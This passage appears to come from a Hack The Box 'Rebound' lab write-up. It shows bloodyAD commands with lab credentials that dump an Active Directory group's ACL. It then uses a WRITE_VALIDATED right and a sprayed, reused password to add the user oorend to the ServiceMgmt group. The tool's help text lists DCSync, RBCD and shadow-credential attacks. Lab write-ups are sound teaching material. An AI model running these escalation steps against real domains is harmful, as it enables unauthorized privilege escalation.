ServiceMgmt
One of the most unique things about the target domain is the presence of the single none default group ServiceMgmt
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get search 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' --resolve-sd
distinguishedname: CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
cn: ServiceMgmt
dscorepropagationdata: 2023-04-08 09:07:56+00:00; 1601-01-01 00:00:00+00:00
description: Group used for Services Account management
displayname: ServiceMgmt
grouptype: -2147483646
instancetype: 4
member: CN=fflock,CN=Users,DC=rebound,DC=htb; CN=ppaul,CN=Users,DC=rebound,DC=htb
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
ntsecuritydescriptor.acl.0.right: READ_PROP
ntsecuritydescriptor.acl.0.objecttype: Token-Groups-Global-And-Universal
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.1.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.1.objecttype: Send-To
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: oorend
ntsecuritydescriptor.acl.2.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: Domain Admins; LOCAL_SYSTEM; ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.3.right: GENERIC_ALL
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.4.type: == ALLOWED ==
ntsecuritydescriptor.acl.4.trustee: AUTHENTICATED_USERS; PRINCIPAL_SELF
ntsecuritydescriptor.acl.4.right: GENERIC_READ
ntsecuritydescriptor.acl.4.objecttype: Self
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.5.right: READ_PROP
ntsecuritydescriptor.acl.5.objecttype: Account-Restrictions; Group-Membership; Remote-Access-Information; General-Information; Logon-Information
ntsecuritydescriptor.acl.5.inheritedobjecttype: User; inetOrgPerson
ntsecuritydescriptor.acl.5.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: Key Admins; Enterprise Key Admins
ntsecuritydescriptor.acl.6.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.6.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.6.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: CREATOR_OWNER; PRINCIPAL_SELF
ntsecuritydescriptor.acl.7.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.7.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.7.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.7.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.8.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.8.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.8.right: READ_PROP
ntsecuritydescriptor.acl.8.objecttype: Token-Groups
ntsecuritydescriptor.acl.8.inheritedobjecttype: Computer; User
ntsecuritydescriptor.acl.8.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.9.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.9.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.9.right: READ_PROP
ntsecuritydescriptor.acl.9.objecttype: Token-Groups
ntsecuritydescriptor.acl.9.inheritedobjecttype: Group
ntsecuritydescriptor.acl.9.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.10.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: WRITE_PROP
ntsecuritydescriptor.acl.10.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.10.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.10.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.11.right: GENERIC_READ
ntsecuritydescriptor.acl.11.objecttype: Self
ntsecuritydescriptor.acl.11.inheritedobjecttype: User; inetOrgPerson
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.12.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.12.right: GENERIC_READ
ntsecuritydescriptor.acl.12.objecttype: Self
ntsecuritydescriptor.acl.12.inheritedobjecttype: Group
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.13.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.13.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.13.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.14.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.14.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.14.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.14.objecttype: Private-Information
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.15.type: == ALLOWED ==
ntsecuritydescriptor.acl.15.trustee: Enterprise Admins
ntsecuritydescriptor.acl.15.right: GENERIC_ALL
ntsecuritydescriptor.acl.15.objecttype: Self
ntsecuritydescriptor.acl.15.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.16.type: == ALLOWED ==
ntsecuritydescriptor.acl.16.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.16.right: LIST_CHILD
ntsecuritydescriptor.acl.16.objecttype: Self
ntsecuritydescriptor.acl.16.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.17.type: == ALLOWED ==
ntsecuritydescriptor.acl.17.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.17.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.17.objecttype: Self
ntsecuritydescriptor.acl.17.flags: CONTAINER_INHERIT; INHERITED
name: ServiceMgmt
objectcategory: CN=Group,CN=Schema,CN=Configuration,DC=rebound,DC=htb
objectclass: top; group
objectguid: {a7ea5dce-8c4f-40b5-8863-64fd3c27582d}
objectsid: S-1-5-21-4078382237-1492182817-2568127209-7683
samaccountname: ServiceMgmt
samaccounttype: 268435456
usnchanged: 169858
usncreated: 69317
whenchanged: 2023-09-11 12:08:01+00:00
whencreated: 2023-04-08 09:07:56+00:00With the --resolve-sd flag, security descriptor (SD) of the ACL(Access Control List) can be resolved to readable format
While there are a lot of ACEs (Access Control Entries) to go through, there is one that stands out the most
WRITE_VALIDATED
One of the ACEs set to the ServiceMgmt group grants the oorend user WRITE_VALIDATED access to self
- While WRITE_VALIDATED doesn’t appear to be is a standard or widely recognized ACE, it does seem to suggest some kind of write access
- The
oorenduser was confirmed to share the same password from the earlier password spraying attack
Additionally, this part is the reason why I am able to enumerate the group as the ldap_monitor account that is part of the Authenticated Users
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD add --help
usage: bloodyAD add [-h]
{computer,dcsync,dnsRecord,genericAll,groupMember,rbcd,shadowCredentials,uac,user} ...
options:
-h, --help show this help message and exit
add commands:
{computer,dcsync,dnsRecord,genericAll,groupMember,rbcd,shadowCredentials,uac,user}
computer Adds new computer
dcsync Adds DCSync right on domain to provided trustee (Requires to own or to have
WriteDacl on domain object)
dnsRecord This function adds a new DNS record into an AD environment.
genericAll Gives full control to trustee on target (you must own the object or have WriteDacl)
groupMember Adds a new member (user, group, computer) to group
rbcd Adds Resource Based Constraint Delegation for service on target, used to
impersonate a user on target with service (Requires "Write" permission on target's
msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)
shadowCredentials Adds Key Credentials to target, used to impersonate target with added credentials
uac Adds property flags altering user/computer object behavior
user Adds a new userAs BloodyAD also supports the add command, I will attempt to perform write operations to the ServiceMgmt group as the oorend user
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get membership oorend
distinguishedName: CN=Domain Users,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-513
sAMAccountName: Domain Users
distinguishedName: CN=Users,CN=Builtin,DC=rebound,DC=htb
objectSid: S-1-5-32-545
sAMAccountName: UsersThe oorend user currently has memberships to both Domain Users group and Users group respectively in domain and system level
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' 'CN=oorend,CN=Users,DC=rebound,DC=htb'
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=ServiceMgmt,CN=Users,DC=rebound,DC=htbApparently, the WRITE_VALIDATED access allows me to make the oorend user part of the ServiceMgmt group
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get membership oorend
distinguishedName: CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-7683
sAMAccountName: ServiceMgmt
distinguishedName: CN=Domain Users,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-513
sAMAccountName: Domain Users
distinguishedName: CN=Users,CN=Builtin,DC=rebound,DC=htb
objectSid: S-1-5-32-545
sAMAccountName: UsersLike so. Now I believe this would lead somewhere further